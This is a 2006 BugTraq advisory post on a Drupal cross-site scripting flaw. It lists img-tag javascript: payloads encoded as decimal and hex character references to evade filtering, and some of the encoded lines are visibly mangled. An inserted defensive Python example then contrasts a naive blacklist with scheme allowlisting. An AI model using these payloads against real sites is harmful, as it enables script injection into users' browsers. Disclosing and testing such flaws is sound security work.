BugTraq
Drupal all version xss cehennem.org Jan 02 2006 10:45AM
liz0 bsdmail com (1 replies)
Drupal all version xss
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

------------------------------------------------------------------------

Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:ale
14t('XSS')>
------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:al&#x65rt('XSS')>

------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:ale
14t('XSS')> Vulnerable

post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:al&#x65rt('XSS')> Vulnerable

---------------------------------------------------------

Credit:Liz0ziM
mail:liz0 (at) bsdmail (dot) com
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------

[ reply ]
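
The filtering gap the post describes, as an added example that is not part of the original post or of Drupal's code: a filter that matches `javascript:` on the raw attribute text passes the same value once it is written as numeric character references, while decoding the references before an allowlist check on the URL scheme rejects every form. The function names, the `ALLOWED_SCHEMES` policy and the sample inputs are assumptions constructed for illustration.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}      # assumed policy for <img src>
PAGE_SRC = "javascript:alert('XSS')"     # the src value quoted in the post

def as_char_refs(text, hex_form=False, semicolons=False):
    """Constructed test input: rewrite text as numeric character references."""
    fmt = "&#x%X" if hex_form else "&#%d"
    end = ";" if semicolons else ""
    return "".join(fmt % ord(ch) + end for ch in text)

def naive_is_safe(src):
    """Blacklist match on the raw attribute text (hypothetical weak filter)."""
    return "javascript:" not in src.lower()

def strict_is_safe(src):
    """Decode character references first, then allowlist the URL scheme."""
    decoded = html.unescape(src)         # also decodes references lacking ';'
    # Drop whitespace and control characters before looking for a scheme.
    decoded = re.sub(r"[\x00-\x20]+", "", decoded)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", decoded)
    if m is None:
        return True                      # relative URL, no scheme present
    return m.group(1).lower() in ALLOWED_SCHEMES

def compare():
    """Return {sample name: (naive verdict, strict verdict)}."""
    samples = {
        "plain": PAGE_SRC,
        "decimal, no semicolons": as_char_refs(PAGE_SRC),
        "decimal, semicolons": as_char_refs(PAGE_SRC, semicolons=True),
        "hex, no semicolons": as_char_refs(PAGE_SRC, hex_form=True),
        "http image": "http://example.org/a.png",
        "relative image": "/files/a.png",
    }
    return {name: (naive_is_safe(s), strict_is_safe(s))
            for name, s in samples.items()}

if __name__ == "__main__":
    for name, (naive, strict) in compare().items():
        print(f"{name:24} naive_safe={naive!s:5} strict_safe={strict}")
```

Scheme allowlisting after decoding is one layer; untrusted markup should still go through a maintained HTML sanitizer and be output-encoded for its context.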
Re: Drupal all version xss cehennem.org Jan 03 2006 08:38PM
RSnake (rsnake shocking com)


 
